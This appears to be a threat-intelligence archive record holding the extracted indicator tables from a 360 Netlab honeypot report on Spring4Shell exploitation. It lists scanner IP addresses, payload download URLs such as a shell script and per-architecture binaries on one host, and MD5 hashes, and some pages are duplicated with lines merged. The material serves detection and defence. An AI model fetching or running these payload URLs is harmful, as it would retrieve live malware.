The Netherlands AS208294 RELAYON\r\n185.220.101.61 The Netherlands AS208294 RELAYON\r\n185.220.101.62 The Netherlands AS208294 RELAYON\r\n185.220.101.63 The Netherlands AS208294 RELAYON\r\n185.220.102.240 The Netherlands AS60729 ZWIEBELFREUNDE\r\n185.220.102.245 The Netherlands AS60729 ZWIEBELFREUNDE\r\n185.220.102.249 The Netherlands AS60729 ZWIEBELFREUNDE\r\n185.220.102.254 The Netherlands AS60729 ZWIEBELFREUNDE\r\n185.220.103.7 United States AS4224 CALYX-AS\r\n185.226.67.169 Greece AS205053 Aweb-ASN\r\n185.243.218.27 Norway AS56655 TERRAHOST\r\n185.246.188.95 Belgium AS3164 ASTIMP-IT\r\n185.247.226.98 Iceland AS200651 FlokiNET\r\n185.254.75.32 Germany AS3214 XTOM\r\n188.68.58.0 Germany AS197540 netcup-AS\r\n192.42.116.23 The Netherlands AS1101 IP-EEND-AS\r\n193.31.24.154 Germany AS197540 netcup-AS\r\n193.110.95.34 Switzerland AS13030 INIT7\r\n193.111.199.64 Germany AS24961 MYLOC-AS\r\n193.218.118.95 Ukraine AS207656 EPINATURA\r\n193.218.118.183 Ukraine AS207656 EPINATURA\r\n193.218.118.231 Ukraine AS207656 EPINATURA\r\n194.31.98.186 The Netherlands AS213035 AS-SERVERION\r\n194.233.77.245 Singapore AS141995 CAPL-AS-AP\r\n195.176.3.19 Switzerland AS559 SWITCH\r\n195.176.3.23 Switzerland AS559 SWITCH\r\n198.54.128.102 United States AS11878 TZULO\r\n198.98.51.189 United States AS53667 PONYNET\r\n198.98.57.207 United States AS53667 PONYNET\r\n198.144.121.43 The Netherlands AS206264 AMARUTU-TECHNOLOGY\r\n199.195.248.29 United States AS53667 PONYNET\r\n199.195.254.81 United States AS53667 PONYNET\r\n199.249.230.87 United States AS62744 QUINTEX\r\n203.175.13.118 China AS141677 NATHOSTS-AS-AP\r\n204.8.156.142 United States AS10961 BGP-AS\r\n205.185.117.149 United States AS53667 PONYNET\r\n205.185.124.178 United States AS53667 PONYNET\r\n209.141.41.103 United States AS53667 PONYNET\r\n209.141.44.64 United States AS53667 PONYNET\r\n209.141.45.189 United States AS53667 PONYNET\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 16 of 18\n\n209.141.46.81 United States AS53667 PONYNET\r\n209.141.46.203 United States AS53667 PONYNET\r\n209.141.54.195 United States AS53667 PONYNET\r\n209.141.55.26 United States AS53667 PONYNET\r\n209.141.57.178 United States AS53667 PONYNET\r\n209.141.58.146 United States AS53667 PONYNET\r\n209.141.60.19 United States AS53667 PONYNET\r\n210.217.18.88 South Korea AS4766 KIXS-AS-KR\r\n211.20.42.23 China AS3462 HINET\r\n212.107.30.157 China AS41378 KirinoNET\r\n213.61.215.54 Germany AS8220 COLT\r\n213.164.204.146 Sweden AS8473 BAHNHOF\r\n217.138.199.93 Czech Republic AS9009 M247\r\nURL\r\nhttp://107.174.133.167/gmpsl\r\nhttp://107.174.133.167/gi686\r\nhttp://107.174.133.167/garm\r\nhttp://107.174.133.167/gmips\r\nhttp://107.174.133.167/garm7\r\nhttp://107.174.133.167/gx86\r\nhttp://107.174.133.167/t.sh\r\nhttp://107.174.133.167/garm6\r\nhttp://107.174.133.167/garm5\r\nhttp://15.185.213.122:65123/javac\r\nhttp://15.185.213.122:65123\r\nbase64://be3f78b59fa14140b6cc8633bf705a75\r\nhttp://15.185.213.122:65123/java\r\nbase64://c08fec5682085417b0a039bdf47c38f2\r\nMD5\r\n4bcd19351697d04fb357ce5b36600207\r\n7d244e7bf48d6631b588cecae87e759d\r\n9c14d670a48bba4b7c047a01d417f8f2\r\n97a7a357b8290a7236a5fbf45f17569f\r\n7621f1a5e8db18f3ae30031122c9c397\r\n100674f1e3ecfb6fa244de4ba7fd2ae2\r\n329155ab45e244661a7725d81dfad740\r\n611630a580e33017be32de8c72625489\r\n650152a2fe78dfceceb4d1a1fdeaccb8\r\n400590515f0f1cf942fe734126be94e7\r\na8a36132632366c7f65066b23d6f7e4f\r\nb1124c862998bc4ab3ff8b1d471310a6\r\ncca63413e3ca6b834b6a4446768c5ccb\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 17 of 18\n\ndcc157b2c284ac676000d64dd33f3ec4\r\ne1190f07a6da91caaa317affc9512caa\r\neba95249cf0a51e300d7b6029cf7088e\r\nfb63e9a23dbf4124116471fcf3254283\r\nfd839753ca4d89c0ccd229b12f95827c\r\nSource: https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nhttps://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/\r\nPage 18 of 18\n\n https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/  \n23.128.248.29 United States AS398355 DATAIDEAS-LLC\n23.128.248.33 United States AS398355 DATAIDEAS-LLC\n23.128.248.34 United States AS398355 DATAIDEAS-LLC\n23.128.248.38 United States AS398355 DATAIDEAS-LLC\n23.128.248.39 United States AS398355 DATAIDEAS-LLC\n23.128.248.40 United States AS398355 DATAIDEAS-LLC\n23.128.248.41 United States AS398355 DATAIDEAS-LLC\n23.128.248.42 United States AS398355 DATAIDEAS-LLC\n23.128.248.43 United States AS398355 DATAIDEAS-LLC\n23.128.248.44 United States AS398355 DATAIDEAS-LLC\n23.128.248.46 United States AS398355 DATAIDEAS-LLC\n23.128.248.48 United States AS398355 DATAIDEAS-LLC\n23.128.248.50 United States AS398355 DATAIDEAS-LLC\n23.128.248.51 United States AS398355 DATAIDEAS-LLC\n23.128.248.53 United States AS398355 DATAIDEAS-LLC\n23.128.248.54 United States AS398355 DATAIDEAS-LLC\n23.128.248.55 United States AS398355 DATAIDEAS-LLC\n23.128.248.56 United States AS398355 DATAIDEAS-LLC\n23.128.248.57 United States AS398355 DATAIDEAS-LLC\n23.128.248.58 United States AS398355 DATAIDEAS-LLC\n23.128.248.59 United States AS398355 DATAIDEAS-LLC\n23.128.248.60 United States AS398355 DATAIDEAS-LLC\n23.128.248.61 United States AS398355 DATAIDEAS-LLC\n23.128.248.62 United States AS398355 DATAIDEAS-LLC\n23.128.248.63 United States AS398355 DATAIDEAS-LLC\n23.128.248.64 United States AS398355 DATAIDEAS-LLC\n23.128.248.65 United States AS398355 DATAIDEAS-LLC\n23.129.64.130 United States AS396507 EMERALD-ONION\n23.129.64.131 United States AS396507 EMERALD-ONION\n23.129.64.132 United States AS396507 EMERALD-ONION\n23.129.64.133 United States AS396507 EMERALD-ONION\n23.129.64.134 United States AS396507 EMERALD-ONION\n23.129.64.135 United States AS396507 EMERALD-ONION\n23.129.64.136 United States AS396507 EMERALD-ONION\n23.129.64.137 United States AS396507 EMERALD-ONION\n23.129.64.138 United States AS396507 EMERALD-ONION\n23.129.64.139 United States AS396507 EMERALD-ONION\n23.129.64.140 United States AS396507 EMERALD-ONION\n23.129.64.141 United States AS396507 EMERALD-ONION\n23.129.64.142 United States AS396507 EMERALD-ONION\n23.129.64.143 United States AS396507 EMERALD-ONION\n23.129.64.145 United States AS396507 EMERALD-ONION\n23.129.64.146 United States AS396507 EMERALD-ONION\n23.129.64.147 United States AS396507 EMERALD-ONION\n23.129.64.148 United States AS396507 EMERALD-ONION\n23.129.64.149 United States AS396507 EMERALD-ONION\n23.129.64.210 United States AS396507 EMERALD-ONION\n  Page 11 of 18 \n\n45.33.101.246 45.61.186.160 United States United States AS63949 AS53667 LINODE-AP PONYNET\n45.78.48.51 Japan AS25820 IT7NET\n45.128.133.242 Belgium AS206804 EstNOC-GLOBAL\n45.129.56.200 Denmark AS39351 ESAB-AS\n45.136.15.239 China AS139659 LUCID-AS-AP\n45.153.160.2 The Netherlands AS212906 moneroj-ca\n45.153.160.132 The Netherlands AS212906 moneroj-ca\n45.153.160.136 The Netherlands AS212906 moneroj-ca\n45.154.255.138 Sweden AS41281 KEFF\n45.154.255.139 Sweden AS41281 KEFF\n45.154.255.147 Sweden AS41281 KEFF\n46.166.139.111 The Netherlands AS43350 NFORCE\n46.175.146.159 The Netherlands AS50673 Serverius-as\n46.232.251.191 Germany AS197540 netcup-AS\n51.15.76.60 The Netherlands AS12876 AS12876\n51.77.52.216 Poland AS16276 OVH\n58.82.211.226 China AS137872 PEOPLESPHONe-HK\n58.240.81.135 China AS4837 CHINA169-Backbone\n60.248.106.229 China AS3462 HINET\n62.102.148.68 Sweden AS51815 TEKNIKBYRAN\n62.102.148.69 Sweden AS51815 TEKNIKBYRAN\n64.113.32.29 United States AS15154 SBBSNET\n66.220.242.222 United States AS17356 VERMONT-TELE\n74.82.47.194 United States AS6939 HURRICANE\n81.17.18.59 Switzerland AS51852 PLI-AS\n81.17.18.62 Switzerland AS51852 PLI-AS\n  Page 12 of 18 \n\n91.250.242.12 92.246.84.133 Romania Germany AS6718 AS44592 NAV SkyLink\n93.95.226.212 Iceland AS44925 THe-1984-AS\n93.174.89.132 The Netherlands AS202425 INT-NETWORK\n93.179.115.27 United States AS25820 IT7NET\n94.140.114.210 Latvia AS43513 NANO-AS\n101.37.159.147 China AS37963 CNNIC-ALIBABA-CN-NET-AP\n103.27.108.196 China AS132883 TOPWAY-AS-AP\n103.42.196.135 India AS138754 KVBPL-AS-IN\n103.42.196.203 India AS138754 KVBPL-AS-IN\n103.108.193.24 China AS139021 WEST263GO-HK\n103.140.186.68 Singapore AS206804 EstNOC-GLOBAL\n103.140.186.72 Singapore AS206804 EstNOC-GLOBAL\n103.140.186.73 Singapore AS206804 EstNOC-GLOBAL\n103.214.146.5 China AS135330 ADCDATACOM-AS-AP\n103.253.41.98 China AS133398 TELe-AS\n104.244.72.115 Luxembourg AS53667 PONYNET\n104.244.76.13 Luxembourg AS53667 PONYNET\n104.244.76.44 Luxembourg AS53667 PONYNET\n104.244.76.170 Luxembourg AS53667 PONYNET\n104.244.77.101 Luxembourg AS53667 PONYNET\n107.189.5.249 Luxembourg AS53667 PONYNET\n109.70.100.19 Austria AS208323 APPLIEDPRIVACY-AS\n109.70.100.31 Austria AS208323 APPLIEDPRIVACY-AS\n109.70.100.82 Austria AS208323 APPLIEDPRIVACY-AS\n109.70.100.84 Austria AS208323 APPLIEDPRIVACY-AS\n109.201.133.100 The Netherlands AS43350 NFORCE\n111.252.183.41 China AS3462 HINET\n111.252.198.28 China AS3462 HINET\n112.5.154.7 China AS9808 CMNET-GD\n112.36.205.252 China AS24444 CMNET-V4shandong-AS-AP\n112.169.175.24 South Korea AS131477 SHHJ-AS\n119.86.148.176 China AS4134 CHINANET-BACKBONE\n124.222.23.106 China AS45090 CNNIC-TENCENT-NET-AP\n128.31.0.13 United States AS3 MIT-GATEWAYS\n141.164.43.95 South Korea AS20473 AS-CHOOPA\n  Page 13 of 18 \n\n172.104.140.107 172.104.159.48 Germany Germany AS63949 AS63949 LINODE-AP LINODE-AP\n172.107.241.110 United States AS40676 AS40676\n172.245.89.109 United States AS36352 AS-COLOCROSSING\n175.178.154.77 China AS45090 CNNIC-TENCENT-NET-AP\n178.17.170.135 Moldova AS43289 TRABIA\n178.17.171.102 Moldova AS43289 TRABIA\n178.17.174.14 Moldova AS43289 TRABIA\n178.20.55.18 France AS29075 IELO\n182.255.45.211 China AS6134 XNNET\n185.34.33.2 France AS28855 OCTOPUCe-AS\n185.36.81.95 Lithuania AS133398 TELe-AS\n185.38.175.130 Denmark AS205235 LABITAT\n185.38.175.131 Denmark AS205235 LABITAT\n185.56.80.65 The Netherlands AS43350 NFORCE\n185.82.126.13 Latvia AS52173 MAKONIX\n185.83.214.69 Portugal AS58110 IPVOLUME\n185.100.86.74 Finland AS200651 FlokiNET\n185.100.86.128 Finland AS200651 FlokiNET\n185.100.87.41 Romania AS200651 FlokiNET\n185.100.87.133 Romania AS200651 FlokiNET\n185.100.87.174 Romania AS200651 FlokiNET\n185.100.87.202 Romania AS200651 FlokiNET\n185.105.90.134 Russia AS205090 FIRST-SERVER-EUROPE\n185.107.47.171 The Netherlands AS43350 NFORCE\n185.107.47.215 The Netherlands AS43350 NFORCE\n  Page 14 of 18 \n\n185.107.70.56 https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/ The Netherlands AS43350 NFORCE\n185.112.147.12 Iceland AS44925 THe-1984-AS\n185.129.62.62 Denmark AS57860 ZENCURITY-NET\n185.163.119.0 Germany AS197540 netcup-AS\n185.165.171.40 Romania AS200651 FlokiNET\n185.165.171.84 Romania AS200651 FlokiNET\n185.170.114.25 Germany AS197540 netcup-AS\n185.174.101.214 United States AS8100 ASN-QUADRANET-GLOBAL\n185.220.100.240 Germany AS205100 F3NETZE\n185.220.100.241 Germany AS205100 F3NETZE\n185.220.100.242 Germany AS205100 F3NETZE\n185.220.100.243 Germany AS205100 F3NETZE\n185.220.100.244 Germany AS205100 F3NETZE\n185.220.100.245 Germany AS205100 F3NETZE\n185.220.100.246 Germany AS205100 F3NETZE\n185.220.100.247 Germany AS205100 F3NETZE\n185.220.100.248 Germany AS205100 F3NETZE\n185.220.100.249 Germany AS205100 F3NETZE\n185.220.100.250 Germany AS205100 F3NETZE\n185.220.100.251 Germany AS205100 F3NETZE\n185.220.100.252 Germany AS205100 F3NETZE\n185.220.100.253 Germany AS205100 F3NETZE\n185.220.100.254 Germany AS205100 F3NETZE\n185.220.100.255 Germany AS205100 F3NETZE\n185.220.101.6 The Netherlands AS208294 RELAYON\n185.220.101.22 The Netherlands AS208294 RELAYON\n185.220.101.32 The Netherlands AS208294 RELAYON\n185.220.101.33 The Netherlands AS208294 RELAYON\n185.220.101.34 The Netherlands AS208294 RELAYON\n185.220.101.35 The Netherlands AS208294 RELAYON\n185.220.101.36 The Netherlands AS208294 RELAYON\n185.220.101.37 The Netherlands AS208294 RELAYON\n185.220.101.38 The Netherlands AS208294 RELAYON\n185.220.101.39 The Netherlands AS208294 RELAYON\n185.220.101.40 The Netherlands AS208294 RELAYON\n185.220.101.41 The Netherlands AS208294 RELAYON\n185.220.101.42 The Netherlands AS208294 RELAYON\n185.220.101.43 The Netherlands AS208294 RELAYON\n185.220.101.44 The Netherlands AS208294 RELAYON\n185.220.101.45 The Netherlands AS208294 RELAYON\n185.220.101.46 The Netherlands AS208294 RELAYON\n185.220.101.47 The Netherlands AS208294 RELAYON\n185.220.101.48 The Netherlands AS208294 RELAYON\n185.220.101.49 The Netherlands AS208294 RELAYON\n185.220.101.50 The Netherlands AS208294 RELAYON\n185.220.101.51 The Netherlands AS208294 RELAYON\n185.220.101.52 The Netherlands AS208294 RELAYON\n  Page 15 of 18 \n\n192.42.116.23 193.31.24.154 The Netherlands Germany AS1101 AS197540 IP-EEND-AS netcup-AS\n193.110.95.34 Switzerland AS13030 INIT7\n193.111.199.64 Germany AS24961 MYLOC-AS\n193.218.118.95 Ukraine AS207656 EPINATURA\n193.218.118.183 Ukraine AS207656 EPINATURA\n193.218.118.231 Ukraine AS207656 EPINATURA\n194.31.98.186 The Netherlands AS213035 AS-SERVERION\n194.233.77.245 Singapore AS141995 CAPL-AS-AP\n195.176.3.19 Switzerland AS559 SWITCH\n195.176.3.23 Switzerland AS559 SWITCH\n198.54.128.102 United States AS11878 TZULO\n198.98.51.189 United States AS53667 PONYNET\n198.98.57.207 United States AS53667 PONYNET\n198.144.121.43 The Netherlands AS206264 AMARUTU-TECHNOLOGY\n199.195.248.29 United States AS53667 PONYNET\n199.195.254.81 United States AS53667 PONYNET\n199.249.230.87 United States AS62744 QUINTEX\n203.175.13.118 China AS141677 NATHOSTS-AS-AP\n204.8.156.142 United States AS10961 BGP-AS\n205.185.117.149 United States AS53667 PONYNET\n205.185.124.178 United States AS53667 PONYNET\n209.141.41.103 United States AS53667 PONYNET\n209.141.44.64 United States AS53667 PONYNET\n209.141.45.189 United States AS53667 PONYNET\n  Page 16 of 18",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.netlab.360.com/what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en/"
	],
	"report_names": [
		"what-our-honeypot-sees-just-one-day-after-the-spring4shell-advisory-en"
	],
	"threat_actors": [
		{
			"id": "d4b9608d-af69-43bc-a08a-38167ac6306a",
			"created_at": "2023-01-06T13:46:39.335061Z",
			"updated_at": "2026-04-10T02:00:03.291149Z",
			"deleted_at": null,
			"main_name": "LAPSUS",
			"aliases": [
				"Lapsus",
				"LAPSUS$",
				"DEV-0537",
				"SLIPPY SPIDER",
				"Strawberry Tempest",
				"UNC3661"
			],
			"source_name": "MISPGALAXY:LAPSUS",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3fff98c9-ad02-401d-9d4b-f78b5b634f31",
			"created_at": "2023-01-06T13:46:38.376868Z",
			"updated_at": "2026-04-10T02:00:02.949077Z",
			"deleted_at": null,
			"main_name": "Cleaver",
			"aliases": [
				"G0003",
				"Operation Cleaver",
				"Op Cleaver",
				"Tarh Andishan",
				"Alibaba",
				"TG-2889",
				"Cobalt Gypsy"
			],
			"source_name": "MISPGALAXY:Cleaver",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434656,
	"ts_updated_at": 1775791966,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b283b9e2cc26be470bb2f38271e8cf006184c28c.pdf",
		"text": "https://archive.orkl.eu/b283b9e2cc26be470bb2f38271e8cf006184c28c.txt",
		"img": "https://archive.orkl.eu/b283b9e2cc26be470bb2f38271e8cf006184c28c.jpg"
	}
}